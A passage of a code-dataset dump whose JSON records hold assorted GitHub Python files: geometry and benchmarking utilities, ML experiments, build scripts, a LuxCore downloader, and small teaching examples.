numpy.dot(normal, p3)\r\n centroid = numpy.sum(points, 0) / len(points)\r\n\r\n return (normal, offset, centroid)\r\n\r\n\r\ndef fit_plane_to_points(points):\r\n assert len(points) >= 3\r\n return plane_from_points(points[:3])\r\n\r\n # TODO: This is borked :-(\r\n centroid = numpy.sum(points, 0) / len(points)\r\n centered_points = points - centroid\r\n svd = numpy.linalg.svd(numpy.transpose(centered_points))\r\n plane_normal = svd[0][2]\r\n # now that we have the normal let's fit the centroid to the plane to find the offset\r\n offset = numpy.dot(plane_normal, centroid)\r\n return (plane_normal, offset, centroid)\r\n\r\n\r\nclass PlaneFittingTest(unittest.TestCase):\r\n def test_3pts(self):\r\n # unit plane - (0, 0, 1), 0\r\n normal, offset, _ = fit_plane_to_points([(1, -1, 0), (-1, 0, 0), (0, 1, 0)])\r\n self.assertAlmostEqual(normal[0], 0)\r\n self.assertAlmostEqual(normal[1], 0)\r\n self.assertAlmostEqual(normal[2], 1)\r\n self.assertAlmostEqual(offset, 0)\r\n\r\n normal, offset, _ = fit_plane_to_points([(2, -2, 0), (-1, 0, 0), (0, 1, 0)])\r\n self.assertAlmostEqual(normal[0], 0)\r\n self.assertAlmostEqual(normal[1], 0)\r\n self.assertAlmostEqual(normal[2], 1)\r\n self.assertAlmostEqual(offset, 0)\r\n\r\n # offset unit plane - (0, 0, 1), 1\r\n normal, offset, _ = fit_plane_to_points([(2, -2, 1), (-1, 0, 1), (0, 1, 1)])\r\n self.assertAlmostEqual(normal[0], 0)\r\n self.assertAlmostEqual(normal[1], 0)\r\n self.assertAlmostEqual(normal[2], 1)\r\n self.assertAlmostEqual(offset, 1)\r\n\r\n def test_4pts(self):\r\n # unit plane - (0, 0, 1), 0\r\n normal, offset, _ = fit_plane_to_points([(1, -1, 0), (-1, 0, 0), (0, 1, 0), (1, 1, 0)])\r\n self.assertAlmostEqual(normal[0], 0)\r\n self.assertAlmostEqual(normal[1], 0)\r\n self.assertAlmostEqual(normal[2], 1)\r\n self.assertAlmostEqual(offset, 0)\r\n\r\n # can't fit precisely! 
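The disabled SVD branch above takes svd[0][2], a row of U, but for a 3×n input the least-variance direction is a column of U (svd[0][:, -1]) — a plausible reason the fit was "borked". Working on the points as rows avoids the transpose entirely, since the normal is then the last right singular vector; note the recovered normal's sign is arbitrary, so tests should compare up to sign:

import numpy

def fit_plane_svd(points):
    pts = numpy.asarray(points, dtype=float)
    centroid = pts.mean(axis=0)
    _, _, vh = numpy.linalg.svd(pts - centroid)
    normal = vh[-1]                          # direction of least variance
    offset = numpy.dot(normal, centroid)     # plane satisfies normal . x == offset
    return normal, offset, centroid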
unit plane - (0, 0, 1), 0\r\n large = 100000000000\r\n normal, offset, _ = fit_plane_to_points(\r\n [(-large, -large, 0.1), (-large, large, -0.1), (large, -large, 0.1), (large, large, -0.1)])\r\n self.assertAlmostEqual(normal[0], 0)\r\n self.assertAlmostEqual(normal[1], 0)\r\n self.assertAlmostEqual(normal[2], 1)\r\n self.assertAlmostEqual(offset, 0)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n unittest.main()\r\n","repo_name":"andrejtetkic/Speedups","sub_path":"polib/linalg.py","file_name":"linalg.py","file_ext":"py","file_size_in_byte":5904,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"28199185228","text":"import os\n\n# toolchains options\nARCH='arm'\nCPU='TBD'\nCROSS_TOOL='gcc'\n\nif os.getenv('RTT_CC'):\n CROSS_TOOL = os.getenv('RTT_CC')\n\nPLATFORM = 'gcc'\nEXEC_PATH = '/opt/gcc-arm-none-eabi-4_8-2014q1_gri/bin'\n\nif os.getenv('RTT_EXEC_PATH'):\n EXEC_PATH = os.getenv('RTT_EXEC_PATH')\n\nBUILD = 'debug'\n\nif PLATFORM == 'gcc':\n # toolchains\n PREFIX = 'arm-none-eabi-'\n CC = PREFIX + 'gcc'\n AS = PREFIX + 'gcc'\n AR = PREFIX + 'ar'\n CXX = PREFIX + 'g++'\n LINK = PREFIX + 'gcc'\n TARGET_EXT = 'elf'\n SIZE = PREFIX + 'size'\n OBJDUMP = PREFIX + 'objdump'\n OBJCPY = PREFIX + 'objcopy'\n STRIP = PREFIX + 'strip'\n\n DEVICE = ' -march=armv7-a -marm -msoft-float'\n CFLAGS = DEVICE + ' -Wall'\n AFLAGS = ' -c' + DEVICE + ' -x assembler-with-cpp -D__ASSEMBLY__ -I.'\n LINK_SCRIPT = 'link.lds'\n LFLAGS = DEVICE + ' -nostartfiles -Wl,--gc-sections,-Map=rtthread.map,-cref,-u,system_vectors'+\\\n ' -T %s' % LINK_SCRIPT\n\n CPATH = ''\n LPATH = ''\n\n # generate debug info in all cases\n AFLAGS += ' -gdwarf-2'\n CFLAGS += ' -g -gdwarf-2'\n\n if BUILD == 'debug':\n CFLAGS += ' -O0'\n else:\n CFLAGS += ' -O2'\n\n CXXFLAGS = CFLAGS + ' -Woverloaded-virtual -fno-exceptions -fno-rtti'\n\n M_CFLAGS = CFLAGS + ' -mlong-calls -fPIC '\n M_CXXFLAGS = CXXFLAGS + ' -mlong-calls -fPIC'\n M_LFLAGS = DEVICE + CXXFLAGS + ' -Wl,--gc-sections,-z,max-page-size=0x4' +\\\n ' -shared -fPIC -nostartfiles -nostdlib -static-libgcc'\n M_POST_ACTION = STRIP + ' -R .hash $TARGET\\n' + SIZE + ' $TARGET \\n'\n\n POST_ACTION = OBJCPY + ' -O binary $TARGET rtthread.bin\\n' +\\\n SIZE + ' $TARGET \\n'\n","repo_name":"RT-Thread/rtthread-specification","sub_path":"smp_skeleton/rtconfig.py","file_name":"rtconfig.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"5"} +{"seq_id":"4682290532","text":"from consts import *\nfrom custom_types import TransitionFunction\nfrom turing_machine import TuringMachine\n\n\nclass FirstMachine(TuringMachine):\n \"\"\"\n A machine to compute the sequence 0 1 0 1 0 1... 
(0 1 0...)\n It never reaches the final state.\n https://en.wikipedia.org/wiki/Turing_machine_examples\n \"\"\"\n def __init__(self,\n tape_string: str = \"\",\n transition_function: TransitionFunction = None,\n *args,\n **kwargs):\n\n if transition_function is None:\n transition_function = {\n (STATE_0, SYMBOL_BLANK): (STATE_1, SYMBOL_0, MOVE_HEAD_RIGHT),\n (STATE_1, SYMBOL_BLANK): (STATE_3, SYMBOL_BLANK, MOVE_HEAD_RIGHT),\n (STATE_3, SYMBOL_BLANK): (STATE_4, SYMBOL_1, MOVE_HEAD_RIGHT),\n (STATE_4, SYMBOL_BLANK): (STATE_0, SYMBOL_BLANK, MOVE_HEAD_RIGHT),\n }\n\n super().__init__(tape_string=tape_string,\n transition_function=transition_function,\n initial_state=STATE_0,\n final_states=set(),\n tape_alphabet={SYMBOL_BLANK, SYMBOL_0, SYMBOL_1},\n input_symbols={SYMBOL_BLANK, SYMBOL_0, SYMBOL_1},\n *args,\n **kwargs)\n","repo_name":"mikgor/Turing-Machines","sub_path":"machines/first_machine.py","file_name":"first_machine.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"44148006738","text":"import copy\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport scipy as sp\r\nfrom scipy.special import logit,expit\r\nimport time\r\nfrom numpy import random,linalg,corrcoef,ones,float32,float64,c_,exp,log\r\nfrom numpy import zeros,mean,where,array,unique,equal\r\nimport torch\r\nimport torchvision\r\nimport torchvision.transforms as transforms\r\n\r\n\r\nfrom mnist import MNIST\r\nmndata = MNIST('/mnist/')\r\nimages, labels = mndata.load_training()\r\ny=np.array(labels).astype(float32)\r\nx=np.array(images).astype(float32)\r\ni0=y==0\r\nin0=y!=0\r\ny[i0]=1.0\r\ny[in0]=0.0\r\nobs=x.shape[0]\r\nvars=x.shape[1]\r\nmi=min(y);y-=mi;ma=max(y);y/=ma;y*=0.98;y+=0.01\r\n\r\n\r\nt1=time.time();neurons=1000;xx=c_[ones((obs,1),float32), x];yy=logit(y);\r\nikeep=round(1.2*obs/neurons)\r\nw=zeros((vars+1,neurons),float32)\r\nt1=time.time()\r\nfor i in range(neurons):\r\n ira=random.randint(0, obs, ikeep)\r\n w[:,i],res1,rank1,s1=linalg.lstsq(xx[ira,:],yy[ira],rcond=-1)\r\n print(\"w-\",i)\r\nt2=time.time()\r\nlayer1=expit(xx @ w)\r\nt2-t1\r\n\r\nv,res1,rank1,s1=linalg.lstsq(layer1,y,rcond=-1)\r\npred=layer1@v\r\nplt.scatter(y,pred)\r\nco=np.corrcoef(pred,y)[0,1]\r\nmo=mean(abs(pred-y))\r\nmse=mean((pred-y)**2)\r\nprint(\"LinearRegression\",co,\" \",mo,\" \",mse)\r\npred=np.round(pred)\r\ny=np.round(y)\r\niok=y==1\r\niok2=y[iok]==pred[iok]\r\nsum(iok2)/sum(iok)\r\nii=np.round(pred)==np.round(y)\r\n100*sum(ii)/len(y)\r\n\r\n\r\n# TEST\r\nimages, labels = mndata.load_testing()\r\nyt=np.array(labels).astype(float32)\r\nxt=np.array(images).astype(float32)\r\ni0=yt==0\r\nin0=yt!=0\r\nyt[i0]=1.0\r\nyt[in0]=0.0\r\nobst=xt.shape[0]\r\nyt-=mi;yt/=ma;yt*=0.98;yt+=0.01\r\nxxt=c_[ones((obst,1),float32), xt]\r\nlayer1t=expit(xxt@w)\r\npredt=layer1t@v\r\nco=np.corrcoef(predt,yt)[0,1]\r\nmo=mean(abs(predt-yt))\r\nmse=mean((predt-yt)**2)\r\nprint(\"LinearRegression\",co,\" \",mo,\" \",mse)\r\nii=np.round(predt)==np.round(yt)\r\n100*sum(ii)/len(yt)\r\n\r\n\r\n00000\r\n\r\n","repo_name":"nbakas/ANNBN.jl","sub_path":"src/python_implementation/annbn_mnist.py","file_name":"annbn_mnist.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"5"} +{"seq_id":"17046638806","text":"\r\nclass Fruits:\r\n\r\n\tdef __init__(self, name, cost):\r\n\t\tself.name = name\r\n\t\tself.cost = cost\r\n\r\n\tdef 
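The MNIST script above is a random-features scheme in the spirit of an extreme learning machine: each hidden unit's input weights come from a least-squares fit on a random row subset, and only the linear output layer is solved globally. A compact sketch of the core pattern with purely random hidden weights — a simplification of what the script does, not a reproduction of it:

import numpy as np
from scipy.special import expit

def random_feature_fit(X, y, neurons=100, seed=0):
    rng = np.random.default_rng(seed)
    Xb = np.c_[np.ones(len(X)), X]                     # bias column
    W = rng.standard_normal((Xb.shape[1], neurons))    # fixed random input weights
    H = expit(Xb @ W)                                  # hidden activations
    v, *_ = np.linalg.lstsq(H, y, rcond=None)          # solve the output layer only
    return W, v

def random_feature_predict(X, W, v):
    Xb = np.c_[np.ones(len(X)), X]
    return expit(Xb @ W) @ v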
Print(self):\r\n\t\tprint(self.name)\r\n\r\nApple = Fruits('Apple', 300)\r\nOrange = Fruits('Orange', 140)\r\n\r\nkey = Fruits.Print #This is the same as (key = lambda x : x.Print()) where x is Apple or Orange.\r\nkey(Apple) #This works; however, Apple.key() does not, which shows that key is not a method of this class.\r\n","repo_name":"Roshan2121/Python-Files","sub_path":"Python oop/lambdaFunction.py","file_name":"lambdaFunction.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"14874552675","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Sep 9 04:12:38 2017\r\n\r\n@author: dariu\r\n\"\"\"\r\n\r\nimport os \r\nimport csv\r\nimport GoogleRoute\r\n\r\ndef getTimes(fileA, fileB):\r\n    #os.chdir('C:\\\\Users\\\\Ronan Perry\\\\Documents\\\\JHU\\\\Medhacks\\\\Python Scripts')\r\n    os.chdir('C:\\\\Users\\\\dariu\\\\OneDrive - Johns Hopkins University\\\\Documents\\\\MedHacks')\r\n    \r\n    with open(fileA, encoding='utf-8-sig') as A:\r\n        csvA = list(csv.reader(A))\r\n    with open(fileB, encoding='utf-8-sig') as B:\r\n        csvB = list(csv.reader(B))\r\n    \r\n    csvNew = []\r\n    for j in csvA:\r\n        min_time = GoogleRoute.route(j,csvB)\r\n        if min_time == None:\r\n            return csvNew\r\n        else:\r\n            csvNew.append(min_time)\r\n    \r\n    return csvNew\r\n    \r\na = getTimes('latlongA.csv','Community_Health_Centers.csv')\r\n\r\nwith open('min_time_map.csv', 'w') as min_time_map:\r\n    b = csv.writer(min_time_map, delimiter=',')\r\n    b.writerows(a)\r\n    min_time_map.close()\r\n    \r\n'''\r\nwith open('min_time.csv', 'w') as min_time:\r\n    b = csv.writer(min_time, delimiter=',')\r\n    B = []\r\n    for i in a:\r\n        C = i[0]\r\n        if len(C) > 0:\r\n            B.append(C)\r\n    b.writerows(B)\r\n    min_time.close()\r\n\r\nwith open('A_latlon.csv', 'w') as A_latlon:\r\n    c = csv.writer(A_latlon, delimiter=',')\r\n    E = []\r\n    for i in a:\r\n        C = i[0]\r\n        #if len(C) > 0:\r\n        E.append(C)\r\n    c.writerows(E)\r\n    A_latlon.close() \r\n    \r\nwith open('B_latlon.csv', 'w') as B_latlon:\r\n    d = csv.writer(B_latlon, delimiter=',')\r\n    G = []\r\n    for i in a:\r\n        F = i[4][5]\r\n        #if len(F) > 0:\r\n        G.append(F) \r\n    d.writerows(G)\r\n    B_latlon.close() \r\n'''","repo_name":"guojoanna/Maptimize","sub_path":"Code/min_path.py","file_name":"min_path.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"74257364632","text":"import time\nimport torch\nimport argparse\nimport json\nfrom dataclasses import asdict\nfrom torchbenchmark.e2e import E2EBenchmarkResult, load_e2e_model_by_name\nfrom typing import Dict\n\nSUPPORT_DEVICE_LIST = [\"cpu\", \"cuda\"]\n\ndef run(func) -> Dict[str, float]:\n    if torch.cuda.is_available():\n        torch.cuda.synchronize()\n    result = {}\n    # Collect time_ns() instead of time() which does not provide better precision than 1\n    # second according to https://docs.python.org/3/library/time.html#time.time.\n    t0 = time.time_ns()\n    func()\n    if torch.cuda.is_available():\n        torch.cuda.synchronize()\n    t2 = time.time_ns()\n    result[\"latency_ms\"] = (t2 - t0) / 1_000_000.0\n    return result\n\ndef gen_result(m, run_result):\n    num_epochs = getattr(m, \"num_epochs\", 1)\n    r = E2EBenchmarkResult(device=m.device, device_num=m.device_num,\n                           test=m.test, num_examples=m.num_examples,\n                           num_epochs=num_epochs, batch_size=m.batch_size, result=dict())\n    r.result[\"latency\"] = run_result[\"latency_ms\"] / 1000.0\n    r.result[\"qps\"] = r.num_examples / r.result[\"latency\"] * 
r.num_epochs\n # add accuracy result if available\n if hasattr(m, \"accuracy\"):\n r.result[\"accuracy\"] = m.accuracy\n return r\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(__doc__)\n parser.add_argument(\"model\", help=\"Full name of the end-to-end model.\")\n parser.add_argument(\"-t\", \"--test\", choices=[\"eval\", \"train\"], default=\"eval\", help=\"Which test to run.\")\n parser.add_argument(\"--bs\", type=int, help=\"Specify batch size.\")\n args, extra_args = parser.parse_known_args()\n\n found = False\n Model = load_e2e_model_by_name(args.model)\n if not Model:\n print(f\"Unable to find model matching {args.model}.\")\n exit(-1)\n m = Model(test=args.test, batch_size=args.bs, extra_args=extra_args)\n test = getattr(m, args.test)\n result = gen_result(m, run(test))\n result_json = json.dumps(asdict(result))\n print(result_json)\n","repo_name":"pytorch/benchmark","sub_path":"run_e2e.py","file_name":"run_e2e.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","stars":699,"dataset":"github-code","pt":"5"} +{"seq_id":"9137266874","text":"from heapq import heapify, heappush, heappop\nN = int(input())\nA = list(map(int, input().split()))\n\nhq1, hq2 = [], []\nheapify(hq1)\nheapify(hq2)\ndp1 = [0]*(3*N)\ndp2 = [0]*(3*N)\nres = 0\nfor i in range(2*N):\n heappush(hq1, A[i])\n res += A[i]\n if len(hq1) > N:\n v = heappop(hq1)\n res -= v\n dp1[i] = res\nres = 0\nfor j in range(3*N-1, N-1, -1):\n heappush(hq2, -A[j])\n res += A[j]\n if len(hq2) > N:\n v = heappop(hq2)\n res += v\n dp2[j] = res\nans = -(1 << 60)\nfor i in range(N-1, 2*N):\n ans = max(ans, dp1[i]-dp2[i+1])\nprint(ans)\n","repo_name":"Nikkuniku/AtcoderProgramming","sub_path":"ABC/ABC001~ABC099/ABC062/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18771130657","text":"import os\nimport sys\nimport requests\nimport platform\nimport site\nfrom importlib import reload\nimport OpenEXR, Imath\nimport numpy as np\nimport FreeCAD as App\nimport logging\n\n\nLUXCORE_LATEST = \"https://github.com/LuxCoreRender/LuxCore/releases/download/latest/\"\nURIS = {\n \"linux\" : LUXCORE_LATEST + \"luxcorerender-latest-linux64.tar.bz2\",\n \"darwin\" : LUXCORE_LATEST + \"luxcorerender-latest-mac64.dmg\",\n \"windows\" : LUXCORE_LATEST + \"luxcorerender-latest-win64.zip\",\n}\nCURRENT_SESSION = None\n\n\nloggerName = \"pyluxcore.tools\"\nlogger = logging.getLogger(loggerName)\nlogging.basicConfig(level=logging.WARNING,\n format=\"[%(threadName)s][%(asctime)s] %(message)s\")\n\n\ndef LuxCoreLogHandler(msg):\n logger.info(msg)\n\n\ndef get(folder=None):\n \"\"\"Returns the luxcore library if possible, None if it is not available\n\n Keyword arguments:\n folder -- The folder where it is supposed we are finding it. If None,\n App.getUserAppDataDir() will be used\n\n Returns:\n The luxcore library, None if there is no such library\n \"\"\"\n folder = os.path.join(folder or App.getUserAppDataDir(), 'LuxCore')\n if not os.path.isdir(folder):\n return None\n if folder not in sys.path:\n sys.path.append(folder)\n reload(site)\n try:\n import pyluxcore\n return pyluxcore\n except ImportError:\n print(\"ImportError\", sys.path)\n pass\n return None\n\n\ndef download(folder=None):\n \"\"\"Download the latest available LuxCore\n\n Keyword arguments:\n folder -- The folder where it will be downloaded. 
If None,\n App.getUserAppDataDir() will be used\n\n Returns:\n The luxcore library, None if there is no such library\n \"\"\"\n pyluxcore = get(folder)\n if pyluxcore is not None:\n return pyluxcore\n\n folder = folder or App.getUserAppDataDir()\n uri = URIS[platform.system().lower()]\n fname = os.path.basename(uri)\n _, ext = os.path.splitext(fname)\n App.Console.PrintMessage(\"Downloading '{}' in '{}'...\\n\".format(uri, folder))\n data = requests.get(uri, allow_redirects=True)\n with open(os.path.join(folder, fname), 'wb') as f:\n f.write(data.content)\n\n if ext == \".bz2\":\n import tarfile\n tf = tarfile.open(os.path.join(folder, fname), 'r:bz2')\n tf.extractall(path=folder)\n elif ext == \".zip\":\n import zipfile\n tf = zipfile.ZipFile(os.path.join(folder, fname))\n tf.extractall(path=folder)\n elif ext in [\".7z\", \".7zip\", \".dmg\"]:\n import py7zr \n tf = py7zr.SevenZipFile(os.path.join(folder, fname), mode='r')\n tf.extractall(path=folder)\n\n return get(folder)\n\n\ndef run_sim(folder, cfg=\"render.cfg\", scn=\"scene.scn\", pyluxcore=None,\n refresh_interval=2500):\n pyluxcore = pyluxcore or download()\n pyluxcore.Init(LuxCoreLogHandler)\n cmd_props = pyluxcore.Properties()\n cmd_props.Set(pyluxcore.Property(\"scene.file\", scn))\n cmd_props.Set(pyluxcore.Property(\"screen.tool.type\", \"IMAGE_VIEW\"))\n\n os.chdir(folder)\n\n cfg_props = pyluxcore.Properties(cfg)\n cfg_props.Set(cmd_props);\n config = pyluxcore.RenderConfig(cfg_props)\n\n config.Parse(pyluxcore.Properties().Set(\n pyluxcore.Property(\"screen.refresh.interval\", refresh_interval)))\n\n session = pyluxcore.RenderSession(config, None, None)\n session.Start()\n\n global CURRENT_SESSION\n CURRENT_SESSION = session\n\n return session\n\n\ndef get_imgs(folder, session=CURRENT_SESSION):\n if session is None:\n return None\n\n session.GetFilm().Save()\n\n pt = Imath.PixelType(Imath.PixelType.FLOAT)\n exr = OpenEXR.InputFile(os.path.join(folder, \"oidn.exr\"))\n dw = exr.header()['dataWindow']\n size = (dw.max.x - dw.min.x + 1, dw.max.y - dw.min.y + 1)\n imgs = []\n for channel in ('R', 'G', 'B'):\n img = np.frombuffer(exr.channel(channel, pt), dtype=np.float32)\n img.shape = (size[1], size[0])\n imgs.append(img)\n return imgs\n","repo_name":"sanguinariojoe/freecad.xray","sub_path":"freecad/xray/xrayUtils/LuxCore.py","file_name":"LuxCore.py","file_ext":"py","file_size_in_byte":3967,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"74257695192","text":"\"\"\"\nUtilities for building pytorch and torch* domain packages\n\"\"\"\nimport os\nimport sys\nimport shutil\nimport subprocess\nfrom dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import List, Dict\n\nCLEANUP_ROUND = 5\n\n@dataclass\nclass TorchRepo:\n name: str\n origin_url: str\n main_branch: str\n src_path: Path\n cur_commit: str\n build_command: List[str]\n\ndef setup_bisection_build_env(env: Dict[str, str]) -> Dict[str, str]:\n env[\"USE_CUDA\"] = \"1\"\n env[\"BUILD_CAFFE2_OPS\"] = \"0\"\n # Do not build the test\n env[\"BUILD_TEST\"] = \"0\"\n env[\"USE_MKLDNN\"] = \"1\"\n env[\"USE_MKL\"] = \"1\"\n env[\"USE_CUDNN\"] = \"1\"\n # Do not depend on ffmpeg, which requires conda-forge\n env[\"USE_FFMPEG\"] = \"0\"\n # Torchaudio SOX build has failures, skip it\n env[\"BUILD_SOX\"] = \"0\"\n # Disable Torchaudio KALDI build\n env[\"BUILD_KALDI\"] = \"0\"\n env[\"CMAKE_PREFIX_PATH\"] = env[\"CONDA_PREFIX\"]\n return env\n\ndef _print_info(info: str):\n 
print(f\"=========================== {info} ===========================\", flush=True)\n\ndef build_pytorch_repo(repo: TorchRepo, build_env: Dict[str, str]):\n # Check if version.py exists, if it does, remove it.\n # This is to force pytorch to update the version.py file upon incremental compilation\n version_py_path = os.path.join(repo.src_path.absolute(), \"torch/version.py\")\n if os.path.exists(version_py_path):\n os.remove(version_py_path)\n try:\n subprocess.check_call(repo.build_command, cwd=repo.src_path.absolute(), env=build_env)\n command_testbuild = [sys.executable, \"-c\", \"'import torch'\"]\n subprocess.check_call(command_testbuild, cwd=os.environ[\"HOME\"], env=build_env)\n except subprocess.CalledProcessError:\n _print_info(f\"BUILDING {repo.name.upper()} commit {repo.cur_commit} 2ND TRY\")\n # Remove the build directory, then try building it again\n build_path = os.path.join(repo.src_path.absolute(), \"build\")\n if os.path.exists(build_path):\n shutil.rmtree(build_path)\n subprocess.check_call(repo.build_command, cwd=repo.src_path.absolute(), env=build_env)\n\ndef build_repo(repo: TorchRepo, build_env: Dict[str, str]):\n _print_info(f\"BUILDING {repo.name.upper()} commit {repo.cur_commit} START\")\n if repo.name == \"pytorch\":\n build_pytorch_repo(repo, build_env)\n else:\n subprocess.check_call(repo.build_command, cwd=repo.src_path, env=build_env)\n _print_info(f\"BUILDING {repo.name.upper()} commit {repo.cur_commit} END\")\n\ndef cleanup_torch_packages(pkgs: List[str]=[]):\n if not len(pkgs):\n pkgs = [\"torch\", \"torchvision\", \"torchaudio\", \"torchdata\"]\n for _ in range(CLEANUP_ROUND):\n command = \"pip uninstall -y \" + \" \".join(pkgs) + \" || true\"\n subprocess.check_call(command, shell=True)\n","repo_name":"pytorch/benchmark","sub_path":"utils/build_utils.py","file_name":"build_utils.py","file_ext":"py","file_size_in_byte":2809,"program_lang":"python","lang":"en","doc_type":"code","stars":699,"dataset":"github-code","pt":"5"} +{"seq_id":"30688481450","text":"from sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import f1_score\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.model_selection import PredefinedSplit\nimport sys\nsys.path.append(\"../\")\nfrom data_processor import Data\n\nclass GaussianNaiveBayesClassifier():\n def __init__(self,training_data_x,training_data_y):\n self.training_data_x = training_data_x\n self.training_data_y = training_data_y\n self.initialize_classifier()\n\n def initialize_classifier(self,**kwargs):\n self.classifier = GaussianNB(**kwargs)\n\n def train(self):\n self.classifier.fit(self.training_data_x,self.training_data_y)\n\n def predict(self,sample_x):\n return self.classifier.predict(sample_x)\n\n def get_f1_measure(self,sample_x,sample_y):\n predictions = self.predict(sample_x)\n score = f1_score(\n y_true=sample_y,\n y_pred=predictions,\n average=\"micro\"\n )\n return score\n\n\n def find_best_params(self,validation_data_x,validation_data_y,n_jobs=1,params=[]):\n if not params:\n params = self.get_default_param_grid()\n\n merged_x = Data.merge_arrays(self.training_data_x, validation_data_x)\n merged_y = Data.merge_arrays(self.training_data_y, validation_data_y)\n test_fold = []\n\n for i in range(0,len(self.training_data_y)):\n test_fold.append(1)\n for i in range(0,len(validation_data_y)):\n test_fold.append(0)\n\n cv = PredefinedSplit(test_fold)\n\n gs = GridSearchCV(\n estimator=GaussianNB(),\n scoring='f1_micro',\n param_grid=params,\n n_jobs=n_jobs,\n cv=cv\n )\n\n 
gs.fit(merged_x,merged_y)\n\n        best_params = gs.best_params_\n        results = gs.cv_results_\n        return best_params,results\n\n    def get_default_param_grid(self):\n        var_smoothing = []\n        smoothing = 0.00000000001\n        while smoothing<1:\n            var_smoothing.append(smoothing)\n            smoothing*=10\n        return {\"var_smoothing\":var_smoothing}","repo_name":"tahasalman/SentimentAnalysis","sub_path":"Classifiers/gnb.py","file_name":"gnb.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"26614750830","text":"import sympy as sp \r\n\r\nx = sp.symbols('x')\r\n\r\n#question a -----------------------------------------\r\nfa = 3*x**4 - 16*x**3 + 18*x**2 - 9\r\n\r\ndfa = sp.diff(fa, x)\r\ndfa2 = sp.diff(fa, x, 2)\r\n\r\nprint(\"Critical values:\", sp.solve(dfa, x))\r\n\r\nfor i in sp.solve(dfa, x):\r\n    if dfa2.subs(x, i) > 0:\r\n        print(\"fa has a local minimum at\", i)\r\n    elif dfa2.subs(x, i) < 0:\r\n        print(\"fa has a local maximum at\", i)\r\n    else:\r\n        print(\"fa is not defined\")\r\n\r\n#question b -----------------------------------------\r\nfb = (x + 2)/(2*x**2)\r\n\r\ndfb = sp.diff(fb, x)\r\ndfb2 = sp.diff(fb, x, 2)\r\n\r\nprint(\"Critical values:\", sp.solve(dfb, x))\r\n\r\nfor i in sp.solve(dfb, x):\r\n    if dfb2.subs(x, i) > 0:\r\n        print(\"fb has a local minimum at\", i)\r\n    elif dfb2.subs(x, i) < 0:\r\n        print(\"fb has a local maximum at\", i)\r\n    else:\r\n        print(\"fb is not defined\")\r\n\r\n#question c -----------------------------------------\r\nfc = -(x**2)/3 + x**2 + 3*x + 4\r\n\r\ndfc = sp.diff(fc, x)\r\ndfc2 = sp.diff(fc, x, 2)\r\n\r\nprint(\"Critical values:\", sp.solve(dfc, x))\r\n\r\nfor i in sp.solve(dfc, x):\r\n    if dfc2.subs(x, i) > 0:\r\n        print(\"fc has a local minimum at\", i)\r\n    elif dfc2.subs(x, i) < 0:\r\n        print(\"fc has a local maximum at\", i)\r\n    else:\r\n        print(\"fc is not defined\")\r\n\r\n#question d -----------------------------------------\r\nfd = (5*x**2 + 5)/x\r\n\r\ndfd = sp.diff(fd, x)\r\ndfd2 = sp.diff(fd, x, 2)\r\n\r\nprint(\"Critical values:\", sp.solve(dfd, x))\r\n\r\nfor i in sp.solve(dfd, x):\r\n    if dfd2.subs(x, i) > 0:\r\n        print(\"fd has a local minimum at\", i)\r\n    elif dfd2.subs(x, i) < 0:\r\n        print(\"fd has a local maximum at\", i)\r\n    else:\r\n        print(\"fd is not defined\")\r\n\r\n","repo_name":"giahao1411/TDTU-Projects","sub_path":"All-Labs/Python-Labs/Calculus/lab9/cau2.py","file_name":"cau2.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"26017471385","text":"# coding: utf8\n\n__contact__ = \"info@hytech-imaging.fr\"\n__copyright__ = \"Copyright (c) 2021 Hytech Imaging\"\n\nimport os.path\nfrom .thread_sound_recording import ThreadForSoundRecording\nfrom qgis.PyQt.QtCore import pyqtSignal, QObject\nfrom datetime import datetime\n\n\nclass SammoSoundRecordingController(QObject):\n    onStopSoundRecordingForEventSignal = pyqtSignal(bool, str, str, str)\n    onSoundRecordingStatusChanged = pyqtSignal(bool)\n\n    def __init__(self):\n        super().__init__()\n        self._workingDirectory: str = None\n        self._threadSoundRecording = self._createSoundRecording()\n        self._currentSoundFileName: str = None\n        self._startTimerOnRecordForCurrentEvent: float = None\n        self._isCurrentEventAnObservation: bool = None\n\n    def unload(self):\n        if self._threadSoundRecording.isProceeding:\n            self._onAutomaticStopRecordingTimerEnded()\n\n    def onStartObservation(self):\n        self._onStartEventWhichNeedSoundRecord(True)\n\n    def 
